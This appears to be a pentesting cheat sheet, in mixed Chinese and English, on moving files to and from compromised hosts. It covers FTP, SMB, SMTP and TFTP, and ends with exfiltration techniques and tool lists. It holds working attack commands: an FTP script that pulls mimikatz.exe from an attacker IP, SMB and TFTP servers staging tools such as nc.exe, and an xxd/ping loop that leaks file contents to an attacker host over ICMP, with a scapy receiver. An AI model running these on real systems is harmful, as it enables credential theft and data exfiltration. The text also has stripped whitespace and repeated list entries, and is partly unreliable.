#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Windows 客户端
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Kali作为服务器
kali_op1> impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2> smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
或者使用samba创建一个smb共享:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Windows
Exfiltration
Techniques
Exfiltration Over C2 Channel: Utilize the existing command and control channel to exfiltrate data.
Exfiltration Over Alternative Protocol: Use alternative protocols such as DNS, ICMP, or HTTP to exfiltrate data.
Exfiltration Over Unencrypted Protocols: Leverage unencrypted protocols like FTP, Telnet, or HTTP to exfiltrate data.
Exfiltration Over Encrypted Protocols: Utilize encrypted protocols like HTTPS or SSH to exfiltrate data.
Exfiltration Over Ingress Filtering: Bypass egress filtering by exfiltrating data over allowed ingress channels.
Tools
Netcat: A versatile networking utility for reading from and writing to network connections.
PowerShell: A task automation framework for configuring systems and automating tasks.
Certutil: Command-line utility for managing certificates.
Bitsadmin: A tool to create and manage transfer jobs using Background Intelligent Transfer Service (BITS).
FTP: File Transfer Protocol for transferring files between a client and server on a network.
Wget: A command-line utility for downloading files from the web.
Curl: A tool for transferring data with URLs.
SMBClient: A tool for accessing shared folders.
RDP: Remote Desktop Protocol for remote access to Windows systems.
WMIC: Command-line tool for Windows Management Instrumentation.
Reg: Command-line utility for working with the registry.
Schtasks: Command-line tool for managing scheduled tasks.
Bitsadmin: Command-line tool for managing Background Intelligent Transfer Service (BITS) jobs.
Vssadmin: Command-line tool for managing Volume Shadow Copy Service.
Wevtutil: Command-line tool for managing event logs.
Forfiles: Command-line tool for batch processing files.
Robocopy: Command-line tool for copying files and directories.
Diskshadow: Command-line tool for managing shadow copies.
Net: Command-line tool for managing network resources.
Tasklist: Command-line tool for listing running processes.
Taskkill: Command-line tool for terminating processes.
Regsvr32: Command-line tool for registering and unregistering DLLs.
Regini: Command-line tool for modifying registry permissions.
Regsvcs: Command-line tool for registering and unregistering .NET components.
Regsvr32: Command-line tool for registering and unregistering DLLs.
Regsvr32: Command-line tool for registering and unregistering DLLs.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind> netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1> New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2> cdnew_disk:
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
如果您可以将数据发送到SMTP服务器,您可以使用Python创建一个SMTP来接收数据:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
在XP和2003中默认情况下(在其他系统中需要在安装过程中显式添加)
在Kali中,启动TFTP服务器:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp